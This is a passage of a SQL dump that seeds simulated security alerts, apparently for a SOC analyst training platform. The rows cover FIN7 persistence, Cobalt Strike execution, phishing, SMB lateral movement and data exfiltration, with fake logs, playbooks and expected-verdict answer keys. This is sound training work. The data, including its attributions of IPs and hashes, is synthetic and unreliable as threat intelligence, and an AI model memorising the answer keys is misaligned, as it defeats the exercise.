Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple command and control activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash found in relation to a known malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR System\",\"verdict\":\"malicious\",\"details\":\"File identified as a malicious script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1093, 'Data Exfiltration Attempt through Unusual Network Traffic', 'high', 'Network Traffic Analysis', 'In the final stage, the Poseidon Group attempts to exfiltrate sensitive data, threatening to leak it unless their extortion demands are met. Analyzing unusual outbound traffic patterns can help intercept this data before it leaves the network.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:07.000Z\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.89\",\"protocol\":\"HTTPS\",\"bytes_sent\":987654321,\"filename\":\"financial_data_report.zip\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"jdoe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\",\"destination_port\":443}', '2026-01-25 20:00:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Private IP address within the local network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Poseidon Group\'s known command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Poseidon Group for data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_data_report.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file name indicative of sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1094, 'Suspicious Network Traffic Detected', 'medium', 'Network Monitoring', 'A suspicious spear-phishing email was identified targeting an employee in the finance department. It contained a malicious attachment designed to compromise the network.', 'Initial Access', 'T1566.001', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-15T14:23:32Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.50\",\"email_subject\":\"Invoice Attached - Urgent\",\"attachment_name\":\"Invoice_2023.pdf\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"recipient_email\":\"john.doe@retailcorp.com\",\"sender_email\":\"finance@trustedvendor.com\",\"alert_id\":\"123456789\",\"rule_triggered\":\"Spear-Phishing Detection\",\"user_agent\":\"Mozilla/5.0\"}', '2026-01-28 00:05:11', '2026-03-09 21:14:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Malicious PDF file hash used in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@retailcorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Email address belongs to a retail company employee.\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"finance@trustedvendor.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Email address spoofed to appear from a trusted vendor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1095, 'Unauthorized Execution of Penetration Testing Tools', 'high', 'Endpoint Detection and Response', 'The attackers successfully deployed Cobalt Strike, a legitimate penetration testing tool, to execute commands and begin lateral movement within the network.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-09T14:25:35Z\",\"event_id\":\"4720\",\"hostname\":\"compromised-host\",\"username\":\"attacker_user\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start cobaltstrike.exe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"file_hash\":\"3a7d1f7b9a3b4c1d4f3e5b6c7d8e9f1a\",\"file_name\":\"cobaltstrike.exe\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Associated with recent APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7d1f7b9a3b4c1d4f3e5b6c7d8e9f1a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as Cobalt Strike payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cobaltstrike.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Cobalt Strike.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1096, 'Newly Created Scheduled Tasks', 'high', 'System Logs', 'FIN7 has been detected creating a new scheduled task on a compromised system to maintain persistent access. The task was disguised with a legitimate-sounding name to avoid detection.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_id\":4698,\"provider\":\"Microsoft-Windows-TaskScheduler\",\"task_name\":\"UpdateSecurityDefinitions\",\"task_author\":\"SYSTEM\",\"task_trigger\":\"Daily\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Windows\\\\Temp\\\\updater.js\",\"task_user\":\"COMPROMISED_USER\",\"task_description\":\"Scheduled task to keep the system updated\",\"task_creation_time\":\"2023-10-15T03:44:50Z\",\"executing_process\":{\"process_id\":5672,\"process_name\":\"wscript.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\wscript.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Windows\\\\Temp\\\\updater.js\",\"parent_process_id\":1248,\"parent_process_name\":\"explorer.exe\"},\"network_communication\":{\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"initiated_by\":\"wscript.exe\"},\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"internal_ip\":\"192.168.1.10\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"updater.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with FIN7 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for FIN7 malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for FIN7\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"COMPROMISED_USER\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1097, 'Lateral Movement Detected via SMB', 'high', 'Network Traffic Analysis', 'Using compromised credentials, the attackers pivot through the network, exploiting SMB vulnerabilities to reach point-of-sale systems.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:34Z\",\"event_type\":\"SMB_Lateral_Movement_Detected\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.1.15\",\"username\":\"compromised_user\",\"smb_command\":\"SMB_COM_SESSION_SETUP_ANDX\",\"file_accessed\":\"\\\\\\\\10.0.1.15\\\\C$\\\\pos_data\\\\transaction.exe\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"access_granted\",\"logon_type\":\"Network\",\"domain\":\"internal.local\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with lateral movement attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Identified as internal point-of-sale system.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Previously flagged for anomalous behavior.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1098, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention', 'FIN7 exfiltrated sensitive credit card information from POS systems using encrypted channels. The data transfer was masked as legitimate traffic, bypassing standard security checks.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:33Z\",\"event_id\":\"738291\",\"source_ip\":\"10.20.30.40\",\"destination_ip\":\"203.0.113.42\",\"protocol\":\"HTTPS\",\"file_hash\":\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\",\"username\":\"john_doe\",\"filename\":\"credit_card_data.zip\",\"action\":\"exfiltration\",\"status\":\"success\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with compromised POS system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by FIN7 for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware associated with FIN7 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal audit\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unauthorized data transfer.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"credit_card_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file integrity monitoring\",\"verdict\":\"malicious\",\"details\":\"Sensitive data archive intended for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 